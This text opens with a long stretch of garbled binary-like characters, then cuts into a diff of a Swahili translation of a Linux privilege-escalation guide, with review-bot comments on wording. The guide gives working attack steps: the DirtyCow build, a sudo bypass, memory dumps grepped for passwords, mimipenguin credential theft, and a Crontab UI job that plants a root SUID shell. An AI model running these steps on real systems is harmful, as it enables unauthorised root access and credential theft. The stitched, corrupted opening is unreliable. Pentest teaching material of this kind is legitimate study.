zZng*+eN2j~-oxoD8K8uApIOZ_$}ht$8$>>ofdxhzo*o??58i!xdKTUwZflo$W9n#g zR$7{1d3K0BXsQ-_oq}A;t%od0ivhsBCnhQr^vF7+Ccn{Mz2s@g>W@hjSJHs_6qzSr zqzT-s&gGCbH(3<@&rk;~mWvlIcrl9?4_rA`3?r(}$Qo6(I$(X*cSBY=@=o|!SA?9u zztSy}158Ga7A{0i96z%Of#|LV+w_=s(%)SR!AV;_BS94V63msV=I!xA?H}6XM zgAjh->o|`NTOG;sxC#7e7z+>iK^@4mS79uK;Eu&=^WhSNU)CalXJO)St$(!pl$xS&I)0X@{u!PIAw_K;24oT%^OyBD<7BP z6^&HI6``yUR^gh9;@?$YYd=l~w4kOiC1p6JbAvXjf~EvC=gJRgF9{9;qLbG@*SkJv$NSf$BsF3Ok4W+erklq`4tvNci!3C$EtAw zWJ^_D*0+(>Kt+eg^$hQF3ji#Ci)CGF|8~gsc0E1Fcv^Vqgj2nhSPS|u9XBx?XSpD` z{!kLu(j)3!#xz`-uhJd{hlQ32XSn(+8r>kWY1`L${8t@ z5Oij&D;|K`Bi${QAX&2D6~)Sh-ld+4+q%6M$ZJs@fxM8plW*426}=L&KD&LN?$fmp zFBfz;S#w=>LzLoI9@by^lkDdR<^I}=6nNdNK-s{9PhmH6mhPngqZ#yzy_ 
zr(|~M(;55DIqM#>ctWFc=8`gUY*d9|d>1%$D^hm!9dE6@Ke2zi;!Y2R_?!pv8=)OO z2=W}yVE2Lp3X$ojDPE_$eG`uMAzJu78?+j{V+gsPV-z0>02Wmn?$0wSPeMWsNRcy6x*5uQQP^w7Dvjp3bn+eo| z26as{T=@q2Et1Ba)9lWgODv4o*T&QVYn;Z`v;`ipojNOtd`3(A!~LEL9E@bD)Fp=J zxWxUpJ!)IJvarGPjZLIB3-&PQp+R?^%;WW5p*{D1ZqAI4d*DjBX9atF;fCsJ^EISy zli|X`JSmn1TQ=6V{dp=;rag)w&BHvZBkk&tU?0H9)Mn5GapEb(O4jo>-c#T6HWB-F zv@AUzjh?$1-@FpLX$Hy0opUs#z*gX0VUJcOMxi^*zb(;tmmWQKwKfhMfr{J zd?t!xE<|hgmcnK}GHympOZ7bnu^SR1ENfk9HRGT@{Xk6Ikc+oICQ-nDa!ya>X@Ss` zptLX3!kN=1q%uybCnkVO$&BT{JHzc;3dymM{)R1XIbVJOS`z~ZvDqi$U2drpGT)_4 zYFTBDGV;MGqbl36;`sV0Ni{)qIwr*?C%Kp-;KY23MgNuo(9ZM4ihfl=CcjA1tVw$y5|Q% zJ;wSgVM{(`aWYhc2R7p(0`~2W%S~>%!E^DUB?}kzOxq8cv6@G~JXecjxp=s4jzy{J zX{W*v@5$FM0uhKgi&J7qf=njNVCRP3&p&xFJ%x&0_N8~pxp$*^_aYMqZ3=ODX8Xfm z`Z4#Do;+$C!xPGn{kMy+Z%O0nRXQDLg5LIe&(P|xfJ_Hj{zLAy^5{1!Yth# zT3|%|2f|YJt=U?80~l4D={K>iVk@dwO&baiaB%3Jt18^pQOqBPa`AKo`J=7GE~P^e zhIG#IPRI12DZwWV;oR+&*K}Yp7zCgExnCJ3YM%Q&o87`0GPRdG`txu_ILB7Rye!Po zB#)ap)Rqm>9(9739ZJ#Z30=G!oQ6T9Sv5sDo0*mf%5<^OA1qZ+m@F!c4#F;jB@YPO zJ1u4LQwg}8yq&6@NN-$ zi&)gps6jue`Q_E6PlP?6p0Um#*ii(KSdRB;MJO$Z5kn*Sb|_DKK4L4Py_%&pd#Mb89e556v&{K}- zBEPSVGmEgXk%4M0-1#&rB%I;B{n~ zj#FB9$M|;MbdE)IUx$R{YMo22?^oD{f6IQ>OEvfuwikZZ#jTq})RA>*(D%?)VuE{q~)iTxrI-QsIFI4XNxA0_L$XfzZ$C@x@Z)luC_3*2{|{BiI^rg2_! 
z*U)iK;;GPHx}?Vz{NPqso&@t}uvuj@Anxi(3_3AV#cc!dI=rEmu?)O-JAT9V(@F}8 zws<*dD{d}HUr#x21nF%t7f`ZzS5UHunDvjHVqgJRxPmryZ{9a?>?y#(H1d>RHWF?HQovT zT&L2`AD-a#fERmQ05r-egm-&BCLS>)MZB4sAE(81sl)uDtKMtDUL9VJl(e{ZV2rMv zCRU&M&>{IV-LAO)(Kq)3{<&Et0rz_SuP@tEWBa(cG`N3-vwf}OdFG8oDFLzon`9+E zVmW{kmI}Dpq!LkaF$Q1mo1Qcg4bm<-R{i3W(_Iu^VuaNY3Niib1_9@0J(ZfU&&7`- zv#B`A!QULBKOpGL`z8&in{+tiF@R|tt5-(yA{1E~yl zF#qKPble-UV8quyzA0#1Wbyi8<<~hKSD$0K9uGc=wuie7ba0`Rho@x^B4|WQhuI7w z29sfNG5+oR8gvInAv9v8u21hKCNm5DmBYjZ6o3&Xvdl_q?T9zbo3Ac9EzbuLT&jF7 zZ}r>HX6PYrTY}vCBu@-UW8E|Ld7FSzvaX3p9)G2gX{%3=gJac3V9$Pnv zM^gJ(?VD2V=69=amp7hIw*-fky&o|(9f0R>gDMvY2G@gxouxnVbw=KAWk`NFZUPo%wC=W4}vYQbbUS?PoW>Czuj+@EP1Lbqnz zdEwrZb2w*3pdNKKc_bzVF3P(=ke)_?&N3Iv%77j9@=$=@6Xmr4rFd~ zcZ1@fEXAr}rky+Q+bb$4xEy&xCY~S1)sp{B$ z_@%x(56+iwRNEU2y&G<`)G$l8wXMmdm zbUGe3Y*oWD9Z!f?u*hWmv{ZHRFG@8qkY^mMwM%yyo^jVmySKMqXrirL1sWCch4q;` zO&W-{R{IzaSB?wqs^U^YQCSeXTEI-ivJc#Vsu@b&ZXU-arMx44R40UPa>? zu>#l>5qfxd3?enA2o9gqu73rZMyrS1emK-SiRh9Ee&_0JG(59o8+56Y9ym??v{a<9S|NH&@ z`$hi0{&Lk~B*|mL6B)>J;vZ=ia*f)A1Y|-*M@V#6f%Z$;Xqo!&#b;bxB~>(~!ruzy6>yWJn$aSI z{~YIk^9vXpoq)?3{D2e!ZS z7*HrejW~%F_wQ_FG$$y(piq2P?(dv`tUy~mYM#5`zcnNGfC;&0|1sq63=fHH<>9>_ zNccakuRjm@3Yd^rQ?4X`Yj^J-y_l6{5|Ih#O z-~6IaiBNlD^G)z?4ey_Y{O>jX&qDt98b|-LkpI20{)x!{4%YwQN91$7ds/dev/null # universal on modern systems ``` ### Path -Ikiwa una **write permissions on any folder inside the `PATH`** variable, unaweza kuwa na uwezo wa hijack baadhi ya libraries au binaries: +Ikiwa **una ruhusa za kuandika kwenye folda yoyote ndani ya variable ya `PATH`** unaweza ku-hijack baadhi ya libraries au binaries: ```bash echo $PATH ``` -### Env info +### Taarifa za Env -Je, kuna taarifa za kuvutia, passwords au API keys ndani ya environment variables? +Je, kuna taarifa za kuvutia, nywila au API keys katika environment variables? ```bash (env || set) 2>/dev/null ``` ### Kernel exploits -Kagua toleo la kernel na kama kuna exploit inayoweza kutumika ku-escalate privileges. 
+Angalia toleo la kernel na uone kama kuna exploit yoyote inayoweza kutumika ku-escalate privileges. ```bash cat /proc/version uname -a searchsploit "Linux Kernel" ``` -Unaweza kupata orodha nzuri ya kernel zilizo na udhaifu na baadhi ya **compiled exploits** hapa: [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits) na [exploitdb sploits](https://gitlab.com/exploit-database/exploitdb-bin-sploits).\ +Unaweza kupata orodha nzuri ya kernel zilizo hatarini na baadhi ya **compiled exploits** hapa: [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits) and [exploitdb sploits](https://gitlab.com/exploit-database/exploitdb-bin-sploits).\ Tovuti nyingine ambapo unaweza kupata baadhi ya **compiled exploits**: [https://github.com/bwbwbwbw/linux-exploit-binaries](https://github.com/bwbwbwbw/linux-exploit-binaries), [https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack) -Ili kutoa toleo zote za kernel zilizo na udhaifu kutoka kwenye tovuti hiyo unaweza kufanya: +Ili kutoa toleo zote za kernel zilizo hatarini kutoka kwenye tovuti hiyo unaweza kufanya: ```bash curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' ' ``` -Vifaa vinavyoweza kusaidia kutafuta kernel exploits ni: +Zana ambazo zinaweza kusaidia kutafuta kernel exploits ni: [linux-exploit-suggester.sh](https://github.com/mzet-/linux-exploit-suggester)\ [linux-exploit-suggester2.pl](https://github.com/jondonas/linux-exploit-suggester-2)\ -[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (tekeleza kwenye victim, inachunguza tu exploits kwa kernel 2.x) +[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (endesha KATIKA victim, inachunguza tu exploits za kernel 
2.x) -Daima **tafuta toleo la kernel kwenye Google**, labda toleo lako la kernel limeandikwa katika exploit fulani ya kernel na kwa hivyo utakuwa na uhakika kwamba exploit hii ni halali. +Daima **tafuta toleo la kernel kwenye Google**, labda toleo lako la kernel limeandikwa katika exploit fulani na utakuwa hakika kwamba exploit hiyo ni halali. ### CVE-2016-5195 (DirtyCow) @@ -57,36 +57,36 @@ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c ``` -### Sudo toleo +### Toleo la sudo -Kulingana na matoleo dhaifu ya sudo yanayoonekana katika: +Kulingana na matoleo ya sudo yaliyo dhaifu yanayoonekana katika: ```bash searchsploit sudo ``` -Unaweza kukagua ikiwa toleo la sudo lina udhaifu kwa kutumia grep hii. +Unaweza kuangalia ikiwa toleo la sudo linaweza kuathirika kwa kutumia grep hii. ```bash sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]" ``` -#### sudo < v1.28 +#### sudo < v1.8.28 Kutoka kwa @sickrov ``` sudo -u#-1 /bin/bash ``` -### Dmesg signature verification failed +### Dmesg: ukaguzi wa saini ulishindwa -Angalia **smasher2 box of HTB** kwa **mfano** wa jinsi vuln hii ingeweza kutumika +Angalia **smasher2 box of HTB** kwa **mfano** wa jinsi vuln inaweza kutumika ```bash dmesg 2>/dev/null | grep "signature" ``` -### Ukaguzi zaidi wa mfumo +### Zaidi ya uorodheshaji wa mfumo ```bash date 2>/dev/null #Date (df -h || lsblk) #System stats lscpu #CPU info lpstat -a 2>/dev/null #Printers info ``` -## Orodhesha ulinzi unaowezekana +## Orodhesha kinga zinazowezekana ### AppArmor ```bash @@ -123,7 +123,7 @@ cat /proc/sys/kernel/randomize_va_space 2>/dev/null ``` ## Docker Breakout -Ikiwa uko ndani ya docker container unaweza kujaribu kutoroka kutoka ndani yake: +Ikiwa uko ndani ya docker container, unaweza kujaribu kutoroka kutoka ndani yake: {{#ref}} docker-security/ 
@@ -131,7 +131,7 @@ docker-security/ ## Diski -Angalia **what is mounted and unmounted**, wapi na kwa nini. Ikiwa kitu chochote kime unmounted unaweza kujaribu ku-mount na kukagua kwa taarifa za kibinafsi +Angalia **what is mounted and unmounted**, wapi na kwa nini. Ikiwa kitu chochote kime unmounted unaweza kujaribu kukimount na kukagua kwa taarifa binafsi ```bash ls /dev 2>/dev/null | grep -i "sd" cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null 
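Review bot: `kukimount` in `+Angalia **what is mounted and unmounted** ... unaweza kujaribu kukimount` is a form used nowhere else in this file; elsewhere the patch hyphenates borrowed verbs (`ku-hijack`, `ku-compile`, `ku-escalate`), so the previous `ku-mount` is the consistent choice. Both versions also leave `**what is mounted and unmounted**` in English inside a Swahili sentence; if the bold phrase is not meant to stay as an emphasised English term, translate it too.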
@@ -144,56 +144,56 @@ Orodhesha binaries muhimu ```bash which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null ``` -Pia, angalia ikiwa **compiler yoyote imewekwa**. Hii ni muhimu ikiwa utahitaji kutumia kernel exploit, kwani inashauriwa kucompile kwenye mashine utakayotumia (au kwenye ile inayofanana). +Pia, angalia ikiwa **compiler yoyote imewekwa**. Hii ni muhimu ikiwa unahitaji kutumia kernel exploit fulani, kwani inapendekezwa ku-compile kwenye mashine utakayoitumia (au kwenye ile inayofanana). ```bash (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/") ``` -### Programu Zenye udhaifu zilizowekwa +### Programu Zenye Udhaifu Zimewekwa -Angalia **toleo la vifurushi na huduma zilizowekwa**. Huenda kuna toleo la zamani la Nagios (kwa mfano) ambalo linaweza kutumika kwa ajili ya escalating privileges…\ -Inashauriwa kukagua kwa mkono toleo la programu zilizowekwa zinazoshukiwa zaidi. +Angalia **toleo la vifurushi na huduma zilizosanikishwa**. Pengine kuna toleo la zamani la Nagios (kwa mfano) that could be exploited for escalating privileges…\ +Inashauriwa kukagua kwa mkono toleo la programu zilizosanikishwa zinazoshukiwa zaidi. ```bash dpkg -l #Debian rpm -qa #Centos ``` -Ikiwa una ufikiaji wa SSH kwenye mashine, unaweza pia kutumia **openVAS** kuangalia ikiwa programu zilizowekwa ni za zamani au zina udhaifu. +Ikiwa una ufikiaji wa SSH kwenye mashine unaweza pia kutumia **openVAS** kuchunguza programu zilizopitwa na wakati na zilizo hatarini zilizowekwa ndani ya mashine. 
-> [!NOTE] > _Kumbuka kwamba amri hizi zitaonyesha taarifa nyingi ambazo kwa kawaida hazitakuwa na umuhimu, kwa hivyo inashauriwa kutumia programu kama OpenVAS au zinazofanana ambazo zitachek ikiwa toleo lolote la programu zilizowekwa lina udhaifu dhidi ya exploits zinazojulikana_ +> [!NOTE] > _Kumbuka kwamba amri hizi zitaonyesha taarifa nyingi ambazo kwa ujumla hazitakuwa za manufaa, kwa hivyo inapendekezwa programu kama OpenVAS au nyingine zinazofanana ambazo zitakagua ikiwa toleo lolote la programu lililosakinishwa linaweza kuathiriwa na exploits zinazojulikana_ ## Michakato -Angalia **michakato gani** inaendeshwa na ukague ikiwa mchakato wowote una **uruhusa zaidi kuliko inavyopaswa** (labda tomcat ikitekelezwa na root?) +Tazama **ni michakato gani** inayoendeshwa na ukague ikiwa kuna mchakato wowote unao **idhinishwa zaidi kuliko inavyostahili** (labda tomcat inaendeshwa na root?) ```bash ps aux ps -ef top -n 1 ``` -Kila wakati angalia uwezekano wa [**electron/cef/chromium debuggers** running, you could abuse it to escalate privileges](electron-cef-chromium-debugger-abuse.md). **Linpeas** hutambua hayo kwa kuangalia parameter `--inspect` ndani ya mstari wa amri wa mchakato.\ -Pia **angalia vibali vyako juu ya binaries za mchakato**, labda unaweza kuzibadilisha. +Always check for possible [**electron/cef/chromium debuggers** running, you could abuse it to escalate privileges](electron-cef-chromium-debugger-abuse.md). **Linpeas** hutambua hayo kwa kuangalia parameter `--inspect` ndani ya mstari wa amri wa mchakato.\ +Pia **check your privileges over the processes binaries**, labda unaweza kuwaeza kuandika juu ya baadhi yao. -### Ufuatiliaji wa mchakato +### Process monitoring -Unaweza kutumia zana kama [**pspy**](https://github.com/DominicBreuker/pspy) kufuatilia mchakato. Hii inaweza kuwa muhimu sana kutambua mchakato dhaifu yanayoendeshwa mara kwa mara au wakati seti ya mahitaji yanatimizwa. 
+Unaweza kutumia zana kama [**pspy**](https://github.com/DominicBreuker/pspy) kufuatilia michakato. Hii inaweza kuwa ya msaada mkubwa kubaini michakato dhaifu inayotekelezwa mara kwa mara au wakati seti ya mahitaji yanatimizwa. -### Kumbukumbu ya mchakato +### Process memory -Huduma kadhaa za server huhifadhi **credentials kwa maandishi wazi ndani ya memory**.\ -Kwa kawaida utahitaji **root privileges** kusoma memory ya michakato inayomilikiwa na watumiaji wengine, kwa hiyo hii kwa kawaida ni ya zaidi matumizi wakati tayari uko root na unataka kugundua credentials zaidi.\ -Hata hivyo, kumbuka kwamba **kama mtumiaji wa kawaida unaweza kusoma memory ya michakato unayomiliki**. +Baadhi ya services za server huhifadhi **credentials in clear text inside the memory**.\ +Kawaida utahitaji **root privileges** kusoma kumbukumbu za michakato inayomilikiwa na watumiaji wengine, kwa hivyo hii kwa kawaida ni ya msaada zaidi unapokuwa tayari root na unataka kugundua credentials zaidi.\ +Hata hivyo, kumbuka kwamba **as a regular user you can read the memory of the processes you own**. > [!WARNING] -> Kumbuka kwamba sasa mashine nyingi **haziruhusu ptrace kwa default** ambayo inamaanisha huwezi ku-dump mchakato mwingine inayomilikiwa na mtumiaji asiye na vibali. +> Kumbuka kwamba sasa hivi mashine nyingi **haziruhusu ptrace kwa default** ambayo inamaanisha kwamba huwezi dump michakato mingine inayomilikiwa na mtumiaji wako asiye na idhini. > -> The file _**/proc/sys/kernel/yama/ptrace_scope**_ controls the accessibility of ptrace: +> The file _**/proc/sys/kernel/yama/ptrace_scope**_ inasimamia upatikanaji wa ptrace: > -> - **kernel.yama.ptrace_scope = 0**: all processes can be debugged, as long as they have the same uid. This is the classical way of how ptracing worked. +> - **kernel.yama.ptrace_scope = 0**: all processes can be debugged, as long as they have the same uid. Hii ndilo namna ya jadi jinsi ptracing ilivyofanya kazi. 
> - **kernel.yama.ptrace_scope = 1**: only a parent process can be debugged. > - **kernel.yama.ptrace_scope = 2**: Only admin can use ptrace, as it required CAP_SYS_PTRACE capability. > - **kernel.yama.ptrace_scope = 3**: No processes may be traced with ptrace. Once set, a reboot is needed to enable ptracing again. #### GDB -If you have access to the memory of an FTP service (for example) you could get the Heap and search inside of its credentials. +Ikiwa una ufikiaji wa kumbukumbu za huduma ya FTP (kwa mfano) unaweza kupata Heap na kutafuta ndani yake credentials. ```bash gdb -p (gdb) info proc mappings @@ -202,7 +202,7 @@ gdb -p (gdb) q strings /tmp/mem_ftp #User and password ``` -#### GDB Script +#### Skripti ya GDB ```bash:dump-memory.sh #!/bin/bash #./dump-memory.sh @@ -215,7 +215,7 @@ done ``` #### /proc/$pid/maps & /proc/$pid/mem -Kwa ID ya mchakato fulani, **maps inaonyesha jinsi memory inavyopangwa ndani ya nafasi ya anwani za virtual za mchakato huo**; pia inaonyesha **idhinishaji za kila eneo lililopangwa**. Faili bandia **mem** **inafunua memory ya mchakato yenyewe**. Kutoka kwenye faili ya **maps** tunajua ni **maeneo gani ya memory yanayosomika** na offsets zao. Tunatumia taarifa hizi ili **kutafuta (seek) ndani ya faili ya mem na ku-dump maeneo yote yanayosomika** kwenye faili. +Kwa ID ya mchakato fulani, **maps zinaonyesha jinsi kumbukumbu inavyopangwa ndani ya nafasi ya anwani pepe ya mchakato**; pia inaonyesha **uruhusa za kila eneo lililopangwa**. Faili bandia **mem** **inafunua moja kwa moja kumbukumbu za mchakato**. Kutoka kwenye faili ya **maps** tunajua ni **eneo gani za kumbukumbu zinazosomika** na offsets zao. Tunatumia taarifa hizi **kutafuta ndani ya faili ya mem na dump maeneo yote yanayosomika** katika faili. ```bash procdump() ( 
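Review bot: this hunk regresses the translation by putting English back where the previous lines had Swahili: `+... toleo la zamani la Nagios (kwa mfano) that could be exploited for escalating privileges…` (half the sentence untranslated), `+Always check for possible [**electron/cef/chromium debuggers** running, ...]`, `+Pia **check your privileges over the processes binaries**`, `+### Process monitoring`, `+### Process memory`, `+Baadhi ya services za server huhifadhi **credentials in clear text inside the memory**`, `+Hata hivyo, kumbuka kwamba **as a regular user you can read the memory of the processes you own**`, and `+> - **kernel.yama.ptrace_scope = 0**: all processes can be debugged, as long as they have the same uid. Hii ndilo ...` (first half English, second half Swahili). Translate these fully or revert to the `-` lines. Separately, `+> [!NOTE] > _... kwa hivyo inapendekezwa programu kama OpenVAS ...` lost its verb (the old line had `inashauriwa kutumia programu`), `kuwaeza kuandika juu ya baadhi yao` should read `kuweza kuandika juu ya baadhi yao`, and `huwezi dump michakato` mixes an English verb into Swahili (`huwezi ku-dump michakato`, matching the hyphenation used elsewhere).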
@@ -230,14 +230,14 @@ rm $1*.bin ``` #### /dev/mem -`/dev/mem` hutoa ufikiaji wa **kumbukumbu ya kimwili** za mfumo, sio kumbukumbu za virtual. Nafasi ya anwani ya virtual ya kernel inaweza kufikiwa kwa kutumia /dev/kmem.\ -Kwa kawaida, `/dev/mem` inaweza kusomwa tu na **root** na kikundi cha kmem. +`/dev/mem` hutoa ufikiaji wa kumbukumbu ya mfumo ya **kimwili**, si kumbukumbu ya virtual. Nafasi ya anwani ya virtual ya kernel inaweza kufikiwa kwa kutumia /dev/kmem.\ +Kawaida, `/dev/mem` inaweza kusomwa tu na kundi la **root** na **kmem**. ``` strings /dev/mem -n10 | grep -i PASS ``` -### ProcDump kwa linux +### ProcDump for linux -ProcDump ni toleo jipya la Linux la zana ya ProcDump ya kitambo kutoka kwenye mkusanyiko wa zana za Sysinternals kwa Windows. Pata kwenye [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux) +ProcDump ni utekelezaji wa ProcDump kwa Linux uliotengenezwa upya wa zana ya ProcDump ya jadi kutoka kwenye mkusanyiko wa zana za Sysinternals kwa Windows. Pata kwenye [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux) ``` procdump -p 1714 
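Review bot: `+Kawaida, /dev/mem inaweza kusomwa tu na kundi la **root** na **kmem**` reads as "the root and kmem group"; the English source says readable only by root and the kmem group, where root is a user and kmem a group, so the old `na **root** na kikundi cha kmem` was the more accurate rendering. `+### ProcDump for linux` reverts a Swahili heading to English while the neighbouring headings stay Swahili, and `+ProcDump ni utekelezaji wa ProcDump kwa Linux uliotengenezwa upya wa zana ya ProcDump ya jadi` repeats "ProcDump" three times; `ProcDump for Linux ni toleo la Linux lililoundwa upya la zana ya ProcDump ya Sysinternals kwa Windows` says the same thing once.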
@@ -264,24 +264,24 @@ Press Ctrl-C to end monitoring without terminating the process. [20:20:58 - INFO]: Timed: [20:21:00 - INFO]: Core dump 0 generated: ./sleep_time_2021-11-03_20:20:58.1714 ``` -### Vifaa +### Zana -Ili kuchoma kumbukumbu ya mchakato unaweza kutumia: +To dump a process memory you could use: - [**https://github.com/Sysinternals/ProcDump-for-Linux**](https://github.com/Sysinternals/ProcDump-for-Linux) -- [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - \_Unaweza kuondoa mahitaji ya root kwa mkono na kuchoma mchakato unaomilikiwa na wewe +- [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - \_Unaweza kuondoa kwa mkono mahitaji ya root na dump mchakato unaomilikiwa na wewe - Script A.5 from [**https://www.delaat.net/rp/2016-2017/p97/report.pdf**](https://www.delaat.net/rp/2016-2017/p97/report.pdf) (root inahitajika) -### Taarifa za kuingia kutoka kumbukumbu za mchakato +### Nyaraka za Uthibitisho kutoka kwa kumbukumbu ya mchakato -#### Mfano kwa mkono +#### Mfano wa mkono -Ikiwa utagundua kuwa mchakato wa authenticator unaendesha: +If you find that the authenticator process is running: ```bash ps -ef | grep "authenticator" root 2027 2025 0 11:46 ? 00:00:00 authenticator ``` -Unaweza dump the process (angalia sehemu zilizotangulia ili kupata njia tofauti za dump the memory of a process) na kutafuta credentials ndani ya memory: +Unaweza dump the process (tazama sehemu zilizopita ili kupata njia tofauti za dump the memory of a process) na kutafuta credentials ndani ya memory: ```bash ./dump-memory.sh 2027 strings *.dump | grep -i password 
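Review bot: two lines in this hunk drop Swahili for English: `+To dump a process memory you could use:` (was `Ili kuchoma kumbukumbu ya mchakato unaweza kutumia:`) and `+If you find that the authenticator process is running:` (was `Ikiwa utagundua kuwa mchakato wa authenticator unaendesha:`); revert them. `+### Nyaraka za Uthibitisho kutoka kwa kumbukumbu ya mchakato` mistranslates "Credentials": `nyaraka za uthibitisho` means verification documents, not login secrets. The rest of the file keeps `credentials` as a loanword (`kutafuta credentials ndani ya memory` two lines later), so `### Credentials kutoka kwa kumbukumbu ya mchakato` would be both clearer and consistent.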
@@ -290,16 +290,16 @@ strings *.dump | grep -i password Chombo [**https://github.com/huntergregal/mimipenguin**](https://github.com/huntergregal/mimipenguin) kitafanya **steal clear text credentials from memory** na kutoka kwa baadhi ya **well known files**. Kinahitaji root privileges ili kifanye kazi ipasavyo. -| Kipengele | Jina la Mchakato | -| ------------------------------------------------- | --------------------- | -| GDM password (Kali Desktop, Debian Desktop) | gdm-password | -| Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) | gnome-keyring-daemon | -| LightDM (Ubuntu Desktop) | lightdm | -| VSFTPd (Active FTP Connections) | vsftpd | -| Apache2 (Active HTTP Basic Auth Sessions) | apache2 | -| OpenSSH (Active SSH Sessions - Sudo Usage) | sshd: | +| Sifa | Jina la Mchakato | +| ------------------------------------------------- | -------------------- | +| GDM password (Kali Desktop, Debian Desktop) | gdm-password | +| Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) | gnome-keyring-daemon | +| LightDM (Ubuntu Desktop) | lightdm | +| VSFTPd (Active FTP Connections) | vsftpd | +| Apache2 (Active HTTP Basic Auth Sessions) | apache2 | +| OpenSSH (Active SSH Sessions - Sudo Usage) | sshd: | -#### Regexes za Utafutaji/[truffleproc](https://github.com/controlplaneio/truffleproc) +#### Regex za Utafutaji/[truffleproc](https://github.com/controlplaneio/truffleproc) ```bash # un truffleproc.sh against your current Bash shell (e.g. $$) ./truffleproc.sh $$ 
@@ -313,39 +313,39 @@ Reading symbols from /lib/x86_64-linux-gnu/librt.so.1... # finding secrets # results in /tmp/tmp.o6HV0Pl3fe/results.txt ``` -## Majukumu yaliyopangwa / Cron jobs +## Kazi Zilizopangwa / Cron jobs -### Crontab UI (alseambusher) inayokimbia kama root – web-based scheduler privesc +### Crontab UI (alseambusher) inayotumika kama root – web-based scheduler privesc -Ikiwa paneli ya wavuti "Crontab UI" (alseambusher/crontab-ui) inakimbia kama root na imefungwa tu kwenye loopback, bado unaweza kuifikia kupitia SSH local port-forwarding na kuunda privileged job ili escalate. +Ikiwa paneli ya mtandao “Crontab UI” (alseambusher/crontab-ui) inaendesha kama root na imefungwa kwa loopback pekee, bado unaweza kuifikia kupitia SSH local port-forwarding na kuunda kazi yenye mamlaka ili privesc. Mnyororo wa kawaida -- Gundua porti inayofunguka tu kwenye loopback (mfano, 127.0.0.1:8000) na Basic-Auth realm kwa kutumia `ss -ntlp` / `curl -v localhost:8000` -- Tafuta credentials katika artifacts za uendeshaji: - - Backups/scripts zenye `zip -P ` - - systemd unit inayoonyesha `Environment="BASIC_AUTH_USER=..."`, `Environment="BASIC_AUTH_PWD=..."` -- Tunneli na login: +- Tambua port inayofungwa kwa loopback pekee (e.g., 127.0.0.1:8000) na Basic-Auth realm kwa kutumia `ss -ntlp` / `curl -v localhost:8000` +- Pata credentials katika artefakti za uendeshaji: +- Backups/skripti zenye `zip -P ` +- unit ya systemd inayofunua `Environment="BASIC_AUTH_USER=..."`, `Environment="BASIC_AUTH_PWD=..."` +- Tuneli na ingia: ```bash ssh -L 9001:localhost:8000 user@target # browse http://localhost:9001 and authenticate ``` -- Tengeneza kazi yenye ruhusa za juu na iendeshe mara moja (inatoa SUID shell): +- Unda high-priv job na iendeshe mara moja (drops SUID shell): ```bash # Name: escalate # Command: cp /bin/bash /tmp/rootshell && chmod 6777 /tmp/rootshell ``` -- Tumia hiyo: +- Tumia: ```bash /tmp/rootshell -p # root shell ``` -Kuimarisha usalama -- Usiendeshe Crontab UI kama root; 
izuilie kwa user maalum na permissions za chini -- Bind to localhost na pia zuii upatikanaji kupitia firewall/VPN; usitumie passwords zilizotumika tena -- Epuka kuingiza secrets ndani ya unit files; tumia secret stores au EnvironmentFile ya root pekee +Kuimarisha +- Usiruhusu Crontab UI kuendesha kama root; kaza kwa mtumiaji maalum na ruhusa ndogo kabisa +- Funga kwenye localhost na pia zuia upatikanaji kupitia firewall/VPN; usirudie passwords +- Epuka kuweka secrets ndani ya unit files; tumia secret stores au root-only EnvironmentFile - Washa audit/logging kwa on-demand job executions -Angalia kama kuna scheduled job yoyote yenye udhaifu. Labda unaweza kuchukua faida ya script inayoendeshwa na root (wildcard vuln? unaweza kubadilisha files ambazo root anazitumia? kutumia symlinks? kuunda specific files katika directory ambayo root anaitumia?). +Angalia kama scheduled job yoyote iko vulnerable. Labda unaweza kuchukua faida ya script inayotekelezwa na root (wildcard vuln? unaweza kubadilisha files ambazo root anazitumia? tumia symlinks? unda files maalum kwenye directory ambayo root anatumia?). ```bash crontab -l ls -al /etc/cron* /etc/at* 
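Review bot: the `Pata credentials katika artefakti za uendeshaji:` item loses its nested sub-bullets: the old lines were indented (`-  - Backups/scripts zenye ...`, `-  - systemd unit ...`) and the new ones are flattened to top level (`+- Backups/skripti zenye ...`, `+- unit ya systemd ...`), so the two examples of where credentials turn up now read as sibling steps of the attack chain instead of children of that step. Restore the two-space indent. In the hardening list, `usirudie passwords` ("do not repeat passwords") is not quite "do not reuse passwords"; `usitumie tena nywila zilizotumika kwingine` carries the intended meaning. The technique itself (loopback-only Crontab UI running as root, reached through `ssh -L`, used to drop a `chmod 6777 /tmp/rootshell`) is unchanged and still accurate.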
